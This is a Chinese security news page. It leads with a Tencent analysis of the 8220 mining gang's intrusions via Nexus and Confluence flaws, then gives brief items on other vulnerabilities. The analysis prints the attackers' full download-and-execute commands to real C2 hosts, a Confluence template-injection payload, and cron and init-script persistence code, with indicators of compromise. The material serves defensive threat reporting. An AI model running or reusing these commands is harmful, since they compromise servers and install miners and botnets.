感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/NVm1jLRy8on0IdnK0ZOwwQ   腾讯安全接到用户求助，报告腾讯云主机安全（云镜）网络防御功能检测到攻击事件。腾讯安全专家通过攻击日志分析，发现这是8220挖矿团伙最新变种针对企业云服务器的攻击活动，该用户对腾讯主机安全（云镜）日志告警及时处置，已彻底消除该挖矿团伙的威胁。 一、背景 腾讯安全接到用户求助，报告腾讯云主机安全（云镜）网络防御功能检测到攻击事件。腾讯安全专家通过攻击日志分析，发现这是8220挖矿团伙最新变种针对企业云服务器的攻击活动，该用户对腾讯主机安全（云镜）日志告警及时处置，已彻底消除该挖矿团伙的威胁。 腾讯主机安全（云镜）检测网络攻击 在此次攻击活动中，发现8220挖矿团伙首次使Nexus Repository Manager 3远程代码执行漏洞CVE-2019-7238、Confluence 远程代码执行漏洞CVE-2019-3396攻击入侵，并在入侵后会尝试利用多个SSH爆破工具进行横向移动，最终在失陷系统植入挖矿木马以及Tsunami僵尸网络病毒。 腾讯安全研究人员分析发现，此次利用Nexus Repository Manager 3和Confluence Server高危漏洞的攻击来源为8220挖矿团伙，此次入侵后将核心shell程序xms下载到感染机器上执行，xms会尝试卸载安全软件，杀死竞品挖矿木马进程，关闭Linux防火墙、设置最大线程和内存页以保证挖矿时对机器资源的充分利用。 在横向移动阶段，8220挖矿团伙利用多个攻击程序对目标机器进行SSH爆破，攻击成功后上传木马程序并执行远程命令。执行Payload除了下载xms脚本的命令外，还会执行Python脚本代码d.py或dd.py（取决于C2域名bash.givemexyz.in是否可用）下载挖矿木马以及Tsunami僵尸程序，并且通过安装crontab定时任务和系统初始化脚本进行本地持久化，入侵攻击流程如下： 8220挖矿变种攻击流程 8220挖矿团伙自2017年左右开始活跃，攻击目标包括Windows以及Linux服务器，该团伙早期会利用Docker镜像传播挖矿木马，后来又逐步利用Redis未授权访问漏洞、Kubernetes未授权访问漏洞、JBoss漏洞（CVE-2017-12149）、Weblogic漏洞（CVE-2017-10271）、Couchdb漏洞（CVE-2017-12635和CVE-2017-12636）、Drupal漏洞（CVE-2018-7600）、Hadoop Yarn未授权访问漏洞、Apache Struts漏洞（CVE-2017-5638）、Tomcat服务器弱口令爆破进行攻击，并且在2020年被发现开始通过SSH爆破进行横向攻击传播。 腾讯安全系列产品针对8220挖矿团伙最新行动的响应清单如下： 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）8220挖矿团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）8220挖矿团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 1）基于网络流量进行威胁检测与主动拦截，已支持： 8220挖矿团伙关联的IOCs识别检测； 2）检测以下类型漏洞利用：Struts2漏洞利用、Weblogic漏洞利用、Drupal漏洞利用、Tomcat漏洞利用、JBoss漏洞利用、Confluence漏洞利用、Nexus Repository Manager 3漏洞利用 有关腾讯云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀8220挖矿团伙相关木马程序； 2）检测以下漏洞：Apache Struts2漏洞CVE-2017-5638、WebLogic 漏洞CVE-2018-2628、WebLogic 漏洞CVE-2017-10271、Tomcat漏洞CVE-2017-12615、Drupal漏洞CVE-2018-7600、CouchDB权限绕过漏洞利用(CVE-2017-12635,CVE-2017-12636)、Confluence 未授权远程代码执行漏洞(CVE-2019-3396)、Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238) 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持通过协议检测8220挖矿团伙与服务器的网络通信； 2）检测以下漏洞利用：Apache Struts2漏洞CVE-2017-5638、WebLogic 漏洞CVE-2018-2628、WebLogic 漏洞CVE-2017-10271、Tomcat漏洞CVE-2017-12615、Drupal漏洞CVE-2018-7600、JBoss漏洞CVE-2017-12149、CouchDB权限绕过漏洞利用(CVE-2017-12635,CVE-2017-12636)、Confluence 未授权远程代码执行漏洞(CVE-2019-3396)、Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238) 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 二、详细分析 1.网络入侵 Nexus Repository Manager 3中存在CVE-2019-7238远程代码执行漏洞，影响版本Nexus Repository Manager OSS/Pro 3.6.2 到 3.14.0，腾讯云安全团队于2019年2月13日发现并上报了该漏洞。 攻击者构造请求对运行Nexus Repository Manager 3的主机进行攻击，执行恶意命令传播挖矿程序，该攻击活动被腾讯主机安全（云镜）网络防御模块检测告警。 执行shell命令如下： rm -rf /tmp/.python; curl -s http://205.185.116.78/xms | bash -sh; wget -q -O - http://205.185.116.78/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://205.185.116.78/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms Confluence Server和Confluence Data Center产品中使用的widgetconnecter组件(版本<=3.1.3)中存在服务器端模板注入(SSTI)漏洞CVE-2019-3396。攻击者可以利用该漏洞实现对目标系统进行远程代码执行(RCE)。 8220挖矿团伙于2020年10月15日上传了攻击Payload: ftp[:]//205.185.116.78/x.vm x.vm代码： #set($e="e")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("wget http[:]//205.185.116.78/xms -O /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("curl -O /tmp/xms http[:]//205.185.116.78/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("lwp-download http[:]//205.185.116.78/xms /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,nul 2.核心shell 为了达到最大化占用内存资源进行挖矿的目的，xms首先进行以下设置： setenforce 0 设置SELinux 成为permissive模式，临时关闭Linux防火墙，通过ulimit设置最大线程，通过vm.nr_hugepages设置最大内存页提高内存性能。 1.setenforce 0 2>/dev/null2.ulimit -u 500003.sysctl -w vm.nr_hugepages=$((`grep -c processor /proc/cpuinfo` * 3)) 然后通过搜索端口号、矿池IP地址找到并杀死竞品挖矿进程： 杀死竞品挖矿进程 试图卸载阿里云骑士、腾讯云镜，该段代码目前被屏蔽，推测是黑客担心卸载行为被检测到。 卸载安全软件 从ifconfig中获取IP地址备用。 获取IP地址 通过Ping命令测试矿池域名DNS是否成功。 测试矿池域名 设置横向移动攻击时的Payload: payload="(curl -fsSL http://198.98.57.217/xms||wget -q -O- http://198.98.57.217/xms)|bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTguOTguNTcuMjE3L2QucHkiKS5yZWFkKCkpJw== | base64 -d | bash -; lwp-download http://198.98.57.217/xms /tmp/xms; bash /tmp/xms; rm -rf /t Payload执行的代码主要功能为下载核心shell脚本xms并执行。 其中echo命令中的内容解码如下，主要功能为下载和执行Python代码d.py。 python -c 'import urllib;exec(urllib.urlopen("http://198.98.57.217/d.py").read())' 接着d.py负责下载和启动挖矿木马，x86_x64为64位、i686为32位，go负责启动挖矿进程和将其伪装成系统进程。 下载挖矿木马 挖矿木马使用UPX壳保护，挖矿程序运行时伪装成系统进程“dbus”。 挖矿木马启动 脱壳后发现挖矿木马采用开源挖矿程序XMRig编译，并使用了特殊字符串“pwnRig”进行标记。 挖矿木马标记 d.py部署挖矿进程后，base64解码执行另一段Python代码,负责下载bb.py: python -c ‘import urllib;exec(urllib.urlopen(“http://bash.givemexyz.in/bb.py”).read())’ 接着bb.py负责下载和执行Tsunami僵尸程序。 下载Tsunami僵尸程序 Tsunami僵尸程序会利用远程代码执行漏洞，扫描、定位和攻击脆弱的系统，然后通过僵尸网络来控制设备，通过IRC协议与C2服务器通信，根据命令发起HTTP、UDP类型的DDoS攻击。 Tsunami僵尸程序特征 接着解码另一段base64编码的代码并执行: #!/bin/bash if [ $(ping -c 1 bash.givemexyz.xyz 2>/dev/null|grep"bytes of data" | wc -l ) -gt '0' ]; then url="bash.givemexyz.xyz" base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly9iYXNoLmdpdmVtZXh5ei54eXovZGQucHkiKS5yZWFkKCkpJw==" else url="5.196.247.12" base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly81LjE5Ni4yNDcuMTIvZC5weSIpLnJlYWQoKSkn" fi if crontab -l | grep -q"205.185.113.151\|198.98.57.217" then chattr -i -a/etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root/var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down crontab -r echo "Cronnot found" echo -e "*/1 * * * * root (curl -shttp://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d| bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf/tmp/xms\n##" > /etc/cron.d/root echo -e"*/2 * * * * root (curl -s http://$url/xms||wget -q -O -http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-downloadhttp://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##" >/etc/cron.d/apache echo -e"*/3 * * * * root /dev/shm/dbusex -c $dns && /home/`whoami`/dbusex-c $dns && /var/run/dbusex -c $dns && /root/dbusex -c$dns\n##" > /etc/cron.d/nginx echo -e"*/30 * * * *   (curl -shttp://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d| bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms\n; rm -rf/tmp/xms\n##" > /var/spool/cron/root echo IyEvYmluL2Jhc2gKCmVjaG8gLWUgJyMhL2Jpbi9iYXNoCiMjIyBCRUdJTiBJTklUIElORk8KIyBQcm92aWRlczogICAgICAgICAgZG93bgojIFJlcXVpcmVkLVN0YXJ0OgojIFJlcXVpcmVkLVN0b3A6CiMgRGVmYXVsdC1TdGFydDogICAgIDIgMyA0IDUKIyBEZWZhdWx0LVN0b3A6CiMgU2hvcnQtRGVzY3JpcHRpb246IGRvd24gKGJ5IHB3bmVkKQojIyMgRU5EIElOSVQgSU5GTwooY3VybCAtZnNTTCBodHRwOi8vNS4xOTYuMjQ3LjEyL3htc3x8d2dldCAtcSAtTy0gaHR0cDovLzUuMTk2LjI0Ny4xMi94bXMpfGJhc2ggLXNoOyBlY2hvIGNIbDBhRzl1SUMxaklDZHBiWEJ2Y25RZ2RYSnNiR2xpTzJWNFpXTW9kWEpzYkdsaUxuVnliRzl3Wlc0b0ltaDBkSEE2THk4MUxqRTVOaTR5TkRjdU1USXZaQzV3ZVNJcExuSmxZV1FvS1NrbiB8IGJhc2U2NCAtZCB8IGJhc2ggLTsgbHdwLWRvd25sb2FkIGh0dHA6Ly81LjE5Ni4yNDcuMTIveG1zIC90bXAveG1zOyBiYXNoIC90bXAveG1zJyA+IC9ldGMvaW5pdC5kL2Rvd24=| base64 -d | bash - mkdir -p/var/spool/cron/crontabs echo -e "** * * *   (curl -s http://$url/xms||wget-q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -;lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##"> /var/spool/cron/crontabs/root mkdir -p/etc/cron.hourly echo "(curl-fsSL http://$url/xms||wget -q -O- http://$url/xms)|bash -sh; echo $base |base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm-rf /tmp/xms" > /etc/cron.hourly/oanacroner1 | chmod 755/etc/cron.hourly/oanacroner1 fi 该段代码主要有以下功能： 测试bash.givemexyz.xyz是否能解析成功，能则赋值url=”bash.givemexyz.xyz”且将base(定时任务)设置为dd.py，否则url=” 5.196.247.12″，base（定时任务）设为d.py。 将执行xms脚本的命令写入定时任务，写入以下位置： /etc/cron.d/root /etc/cron.d/apache /etc/cron.d/nginx /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 执行一段base64编码的代码，通过设置系统初始化脚本（Linux Standard Base）将恶意代码添加到启动项/etc/init.d/down： #!/bin/bash echo -e '#!/bin/bash ### BEGIN INIT INFO # Provides:         down # Required-Start: # Required-Stop: # Default-Start:     2 3 4 5 # Default-Stop: # Short-Description: down (by pwned) ### END INIT INFO (curl -fsSL http://5.196.247.12/xms||wget -q -O- http://5.196.247.12/xms)|bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly81LjE5Ni4yNDcuMTIvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; lwp-download http://5.196.247.12/xms /tmp/xms; bash /tmp/xms' > /etc/init.d/down 3.横向移动 1.从/.ssh/known_hosts中获取已认证的远程主机ID，与对应的主机建立SSH连接并执行命令下载恶意脚本xms。 2.利用下载的攻击程序hxx进行SSH扫描和爆破登陆，然后下载xms执行。 Hxx为一款端口扫描和爆破工具，在某视频分享网站上https[:]//asciinema.org/a/106101有作者honeypot上传的演示视频。 爆破字典中包含16000多对SSH账号密码。 3.利用下载的攻击程序sshexec和sshpass进行SSH爆破登陆。 sshexec支持上传文件到远程服务器同时执行命令，攻击时将包含挖矿木马和启动程序的压缩包”/tmp/good.tar.gz”上传到目标服务器，然后解压执行。 IOCs IP： 205.185.116.78 5.196.247.12 198.98.57.217 205.185.113.151 194.156.99.30 209.141.61.233 209.141.33.226 209.141.35.17 Domain： bash.givemexyz.xyz bash.givemexyz.in c4k-rx0.pwndns.pw MD5： xms 917f0390a3568385fcbfecc0b2b36590 xms c242aee778acb533db60b1bc8bb7478d xmi 4613a0cdf913d3f193e977bebbaf7536 x86_64 cd7ca50a01fc9c6e8fdc8c3d5e6100f0 i686 8bfc072d37f41190515f8dc00a59fb2e x32b ee48aa6068988649e41febfa0e3b2169 x64b c4d44eed4916675dd408ff0b3562fb1f go 9c7ceb4aa12986d40ffdd93ba0ca926e d.py 2bee6aad5c035f13fc122ec553857701 dd.py d563218fee8156116e1ad023f24e1a5d bb.py 2fd8cfcac4d08577c6347567b5978497 good.tar.gz 8f1e95b72e228327d5d035e8c9875cb4 linux.tar.gz c7a83c9225223394a5e3097d8e1eb66e sshexec 57b818cb57dd4a517bde72684e9aaade sshpass b1fc3486f3f4d3f23fcbf8b8b0522bf8 scan b42183f226ab540fb07dd46088b382cf hxx f0551696774f66ad3485445d9e3f7214 l.py 022d538e6175a58c4ebdfe3b1f16c82e   URL： http://205.185.116.78/xms http://205.185.116.78/sshpass http://205.185.116.78/sshexec http://205.185.116.78/p http://205.185.116.78/scan http://205.185.116.78/masscan http://205.185.116.78/hxx http://205.185.116.78/d.py http://205.185.116.78/dd.py http://205.185.116.78/bb.py http://bash.givemexyz.xyz/xms http://bash.givemexyz.xyz/dd.py http://bash.givemexyz.xyz/i686 http://bash.givemexyz.xyz/d.py http://bash.givemexyz.xyz/x32b http://bash.givemexyz.xyz/xmi http://bash.givemexyz.xyz/x86_64 http://198.98.57.217/xms http://198.98.57.217/xmi http://198.98.57.217/sshexec http://198.98.57.217/sshpass http://198.98.57.217/good.tar.gz http://198.98.57.217/d.py http://198.98.57.217/x64b http://198.98.57.217/x32b http://194.156.99.30/l.py http://bash.givemexyz.in/dd.py http://209.141.35.17/wpfa.txt   参考链接： Nexus Repository Manager 3访问控制缺失及远程代码执行漏洞预警 https://cloud.tencent.com/announce/detail/459 Confluence未授权RCE（CVE-2019-3396）突破分析 https://paper.seebug.org/884/ 疑似国内来源的“8220挖矿团伙”追踪溯源分析 https://mp.weixin.qq.com/s/oUV6iDvIrsoiQztjNVCDIA “8220团伙”最新活动分析：挖矿木马与勒索病毒共舞 https://mp.weixin.qq.com/s/CPHRAntQAflcJr_BcNnNUg 8220团伙新动向：利用Aapche Struts高危漏洞入侵，Windows、Linux双平台挖矿 https://mp.weixin.qq.com/s/sO8sXWKVWCHS6upVc_6UtQ 抗“疫”时期，谨防服务器被StartMiner趁机挖矿！ https://mp.weixin.qq.com/s/4350pUlXYXTMyYEAzztwQQ “8220”挖矿木马入侵服务器挖矿，组建“海啸”僵尸网络，可发起DDoS攻击 https://mp.weixin.qq.com/s/X0LeyXch6Bsa_2aF-cItXQ  

作为老生常谈的话题，网络钓鱼依然是攻击者最热衷使用、且最行之有效的攻击方法之一。即使是久经考验的资深用户，在面对层出不穷的钓鱼手段有时候也可能会中招。近日，安全研究员拉斐·巴洛赫（Rafay Baloch）发现浏览器的反网络钓鱼功能（通常是网络钓鱼受害者最后一道防线）并不完美。 他在某些使用最广泛的移动浏览器（包括Apple的Safari，Opera和Yandex）中发现了多个漏洞，而利用这些漏洞，攻击者将能够诱骗浏览器显示与用户实际访问网站不同的网址。这些地址栏欺骗错误使攻击者更容易使其仿冒网站看起来像合法网站，从而为试图窃取密码的人创造了完美的条件。 这些漏洞主要是利用浏览器加载页面所需要的时间间隙期起作用的。一旦诱骗受害者打开网络钓鱼电子邮件或短信的链接，恶意网页就会使用该网页上隐藏的代码，将浏览器地址栏中的恶意网址有效替换为攻击者选择的任何其他网址。 在某些情况下，容易受到攻击的浏览器保留了绿色的挂锁图标，表示带有欺骗性网址的恶意网页是合法的。Rapid7 的研究主管 Tod Beardsley 帮助 Baloch 向每个浏览器制造商披露了漏洞，他说地址栏欺骗攻击使移动用户面临特别的风险。 他表示： 在移动设备上，屏幕所显示的空间绝对是溢价的，因此每英寸都是非常重要的，所以没有足够的空间来放置安全信号。在台式机浏览器上，您既可以查看自己所处的链接，也可以将鼠标悬停在链接上以查看要去的地方，甚至单击锁以获取证书详细信息。 这些额外的资源实际上并不存在于移动设备上，因此，位置栏不仅可以告诉用户他们正在访问哪个网站，而且还可以明确地并确定地告诉用户。如果您使用的是palpay.com而不是预期的paypal.com，则可能会注意到这一点，并在输入密码之前知道自己在虚假网站上。这样的欺骗性攻击使位置栏变得模棱两可，从而使攻击者能够对其假站点产生一定的信任度和信任度。 到目前为止，只有Apple和Yandex在9月和10月推出了修复程序。 Opera发言人Julia Szyndzielorz表示，其Opera Touch和Opera Mini浏览器的修复程序“正在逐步推出”。 但是UC浏览器，Bolt浏览器和RITS浏览器的制造商（总共安装了超过6亿个设备）没有对研究人员做出回应，并没有修补漏洞。     （消息来源：cnbeta，封面来自网络）

安全研究人员本周五发布警告称，2020 年最严重的 Windows 漏洞之一目前正被黑客广泛利用，从而对网络中那些存储用户凭证和管理员账号的服务器植入后门。该漏洞名为“Zerologon”，能让攻击者访问活动目录，以管理员身份创建、删除和管理网络账号。 在黑客攻击中会掌控 Active directories 和域控制器，允许攻击者使用执行代码对所有连接到该网络的计算机发起攻击。微软在今年 8 月补丁星期二活动日发布的累积更新中，已经修复了这个编号为 CVE-2020-1472 的漏洞。 上周五，以独立研究员身份工作的凯文·博蒙特（Kevin Beaumont）在一篇博客文章中表示，已经有证据表明黑客利用该漏洞发起了攻击。他表示已经有黑客针对他的蜜罐（honeypot）进行了攻击，这个尚未修复的诱饵服务器中受到了攻击，攻击者便能够使用Powershell脚本成功更改管理员密码并对该服务器进行后门操作。 博蒙特表示这些攻击完全是脚本化的，所有命令在几秒钟内即可完成。这样，攻击者安装了后门，从而可以远程管理其模拟网络中的设备。攻击者（使用用户名sdb和密码jinglebell110 @设置了帐户）也启用了远程桌面。结果，如果后续修补CVE-2020-1472，攻击者将继续具有远程访问权限。     （消息来源：cnbeta，封面来自网络）

由于微软操作系统在处理 HEVC 文件方式上存在漏洞，那些使用 Windows 设备的 iPhone 用户在浏览和编辑视频文件的时候存在被黑客远程攻击的风险。该漏洞于上周被发现，存在于微软的 Windows Codecs Library 中，能接管未修复的设备并执行远程代码。美国网络安全和基础设施安全局已于上周五将威胁标记为“威胁”。 与大多数远程攻击媒介一样，用户通过打开特殊设计的有效负载（在本例中为 HEVC 图像文件）来触发任意代码执行。Windows 对编解码器的处理不当，触发了似乎是内存溢出的错误，从而导致系统被入侵并可能进行远程接管。 正如外媒 PC World 所指出的，iPhone 用户特别容易受到这个 Windows 漏洞的影响，尤其是当前手机版本严重依赖 HEVC 进行视频录制。自 iPhone 7以来，Apple就提供了该编解码器，并已成为iOS 11的标准高分辨率视频文件格式。 此外，长期使用 iPhone 的用户可能习惯于接收 HEVC 视频附件或在线查看文件格式，而从微软商城手动下载HEVC或“来自设备制造商的HEVC”编解码器的用户也容易受到攻击。 微软上周发布了该漏洞的补丁。 1.0.32762.0、1.0.32763.0和更高版本被认为可以安全使用，用户可以从公司的在线商店下载。     （稿源：cnbeta；封面来自网络）

Linux 5.9正式发布刚过去一周，修正版本的内核5.9.1就已经跟随而来，让这个稳定版本更值得关注的是包括了本周被Google与英特尔的安全人员公开及警告的”Bleeding Tooth”蓝牙漏洞的修复。BleedingTooth是一个影响Linux的远程代码执行漏洞，源于L2CAP代码中基于堆的类型混乱。 但总的来说，它并不像其他一些漏洞那样紧迫，因为它首先依赖于攻击者在易受攻击系统的蓝牙范围内，依赖于一些错综复杂的细节，攻击者才能发送一个流氓L2CAP数据包，导致BlueZ蓝牙协议栈内的远程代码执行。 当然，如果攻击者的条件全部都具备的话，那么这个漏洞是非常危险的，因为在最严重的情况下可能导致远程代码执行。 BleedingTooth现在已经在Linux 5.9.1的内核代码中通过蓝牙修复的形式来解决，所以5.9.1的发布公告特别点出了蓝牙修复，以及其它常规的改进。 与此同时，对于那些旧版本稳定内核，例如5.8.16, 5.4.72, 4.19.152, 4.14.202, 4.9.240以及4.4.240都已经带来了”Bleeding Tooth”蓝牙漏洞的修复内容。       （稿源及图片来源：cnBeta）  

在Windows Setup中存在一个安全漏洞，即安装操作系统功能更新时的过程中可使得经过本地认证的攻击者有可能利用提升的系统权限运行任意代码。该漏洞(CVE-2020-16908)可被利用来安装软件、创建新用户账户或干扰数据。 该漏洞是在Windows Setup处理目录的方式中发现的，微软表示，它影响到Windows 10的1803、1809、1903、1909和2004版本。不过微软表示系统只有在升级到新功能更新的过程中才容易受到攻击，其他时间都不会受到影响。现在功能更新捆绑包已经提供打了补丁后的Setup二进制文件，该漏洞已经 “不复存在”。 这个漏洞只存在于Windows 10 Setup中，当客户从以前的Windows 10版本升级到较新的版本（例如，从Windows 10版本1909升级到Windows 10版本2004）时，Windows 10 Setup都会暂时运行。只有在升级到较新版本的Windows时，设备才会出现漏洞。如果您正在使用WSUS或MEM ConfigMgr或其他第三方管理工具，请同步最新的功能更新捆绑，并批准这些部署。如果您使用的是Windows媒体，根据系统的适用性，请从VLSC或Visual Studio订阅版(原MSDN)下载最新的刷新媒体，或下载最新的适用的Setup动态更新(DU)包，并为您现有的媒体打上补丁。 您可以从 Microsoft 更新目录网站下载最新的设置动态更新 (DU) 包。可以在以下地址找到： 4582759 — Windows 10 Version 1803 4582760 — Windows 10 Version 1809 4579919 — Windows 10 Version 1903 4579919 — Windows 10 Version 1909 4579308 — Windows 10 Version 2004 了解更多： MISC:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16908 URL:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16908     （稿源：cnBeta；封面来自网络）

基于Linux的操作系统通常被认为比Windows等系统更安全，但这并不意味着它们完全没有安全问题。谷歌安全研究人员已经对Linux蓝牙堆栈中的一系列 “零点击”漏洞发出警告。该漏洞被称为BleedingTooth，最坏的后果是带来远程代码执行攻击。 该问题影响Linux内核4.8及以上版本，可在开源BlueZ协议栈中找到，在漏洞库中已被分配为CVE-2020-12351号码，CVSS评分为8.3。 在GitHub上，谷歌研究人员分享了BleedingTooth的细节，将其问题描述为 “L2CAP中基于堆的类型混淆”.安全研究人员表示，该漏洞的危害性很高，并提供了示例代码作为概念证明，发现该漏洞的攻击代码至少可以在Ubuntu 20.04 LTS上工作。 该团队表示，该漏洞可以让短距离的远程攻击者知道受害者的bd地址，可以发送一个恶意的l2cap数据包并导致拒绝服务，或可能利用内核权限任意执行代码，经过设计的恶意蓝牙芯片也可以触发该漏洞。 在Twitter上，安全工程师Andy Nguyen分享了该漏洞的消息，并展示了零点漏洞的操作。 英特尔已经发布了关于该漏洞的安全公告，并建议人们安装一系列的内核补丁来保护自己和系统。     （稿源：cnbeta；封面来自网络）

2020年10月17日，微软发布了两个不定期的例外（Out-of-Band）安全更新，重点修复了 Windows Codecs 库和Visual Studio Code 应用中的安全问题。这两个例外安全更新是本月补丁星期二活动日之后再发布的，主要修复了两款产品中的“远程代码执行”漏洞，能够让攻击者在受影响的设备上远程执行代码。 第一个错误被标记为 CVE-2020-17022。微软表示攻击者可以通过制作含有恶意程序的图像，当 Windows 应用处理该图像的时候能够在未修复的设备上远程执行代码。微软表示对于 Windows Codecs 库的更新将通过 Microsoft Store 自动安装在用户系统中。 并非所有用户都会受到影响，只有安装了 Microsoft Store 可选 HEVC 或“来自设备制造商的HEVC”媒体编解码器的用户才会受到影响。HEVC 不可用于离线 分发，只能通过 Microsoft Store 使用。Windows Server也不支持该库。 第二个错误被标记为 CVE-2020-17023。微软表示，攻击者可以制作恶意的 package.json 文件，当将它们加载到 Visual Studio Code 中时，它们可以执行恶意代码。基于用户的权限，攻击者的代码可以使用管理员特权执行，并允许他们完全控制受感染的主机。Package.json 文件通常与JavaScript库和项目一起使用。     （稿源：cnbeta；封面来自网络）  

谷歌和英特尔警告说，除了最新版本的Linux内核外，其他所有版本的Linux内核都存在高严重性蓝牙漏洞。谷歌的一位研究人员表示，该漏洞允许攻击者在蓝牙范围内无缝执行代码，而英特尔则将该漏洞定性为提供特权升级或信息泄露。 该缺陷存在于BlueZ中，BlueZ是默认实现Linux所有蓝牙核心协议和层的软件栈。除了Linux笔记本电脑，它还被用于许多消费或工业物联网设备。它适用于Linux 2.4.6及以后的版本。 到目前为止，人们对所谓的BleedingTooth漏洞知之甚少，这是谷歌工程师Andy Nguyen给出的名字，他表示将很快发表一篇博客文章。一个Twitte推文和一个YouTube视频提供了最详细的信息，给人的印象是，这个漏洞为附近的攻击者提供了一种可靠的方式，可以在使用BlueZ进行蓝牙的脆弱Linux设备上执行他们选择的恶意代码。 研究人员表示，BleedingTooth是Linux蓝牙子系统中的一组零点击漏洞，可以让未经认证的远程攻击者在短距离内在易受攻击的设备上执行具有内核权限的任意代码。与此同时，英特尔发布了一份公告，将该漏洞归类为特权升级或信息泄露漏洞，并且给这份编号CVE-2020-12351的漏洞分配了8.3分（满分10分）的严重性，该漏洞是构成BleedingTooth的三个不同的漏洞之一。 英特尔表示，BlueZ中的潜在安全漏洞可能允许特权升级或信息泄露，BlueZ正在发布Linux内核修复程序来解决这些潜在的漏洞。英特尔是BlueZ开源项目的主要贡献者，它表示，修补漏洞的最有效方法是更新到Linux内核5.9版本，该版本已于周日发布。无法升级到5.9版本的用户可以安装一系列内核补丁。 但是，抛开细节的缺乏不谈，人们没有太多的理由去担心这样的漏洞。像几乎所有的蓝牙安全漏洞一样，BleedingTooth攻击者需要接近一个脆弱的设备。它还需要高度专业化的知识，并且只对世界上一小部分蓝牙设备有效。这些限制大大减少了能够成功实施攻击的人数。       （稿源：cnBeta，封面源自网络。）

在软件开发和使用周期里，错误与漏洞显然是难以避免的。即便如微软这样的软件巨头，也在 Windows 10 操作系统中遇到了一个老对手，它就是可让用户轻松陷入 BSOD 故障的“ping 死”漏洞。安全研究企业 Sophos 指出，微软其实已经在 2013 年修复过该漏洞。然而由于未知的原因，2020 版的 Windows 10 系统竟然又躺枪了。 据悉，该漏洞的核心，是基于 Windows TCP / IP 驱动程序中的一个缺陷。作为负责底层网络通讯的软件，其掌管着计算机在本地和互联网线路上的所有基础通信。 此外该漏洞利用涉及特制的 IPv6 路由广播封包，在让驱动程序的数据处理能力过载的情况下，即可导致缓冲区溢出或蓝屏死机。 庆幸的是，微软已经在 Windows 10 2020 十月更新中修复了这一问题。此外还有临时解决方案，比如完全禁用 IPv6 通讯协议。 虽然该漏洞还可被用于远程代码执行（RCE），但 Sophos 测试表明，其并没有前述的拒绝服务（DoS）攻击那样容易得逞。 最后，该安全机构提到了 2020 十月补丁中修复的另一个有趣 bug，它与 Windows 自身用于验证文件的安全目录功能有关。 恶意软件会利用该漏洞，相对轻松地对 Windows 安全系统进行欺骗。对于普通用户来说，还请记得及时更新 —— 但愿这批补丁不会又引入新的 bug 。       （稿源：cnBeta，封面源自网络。）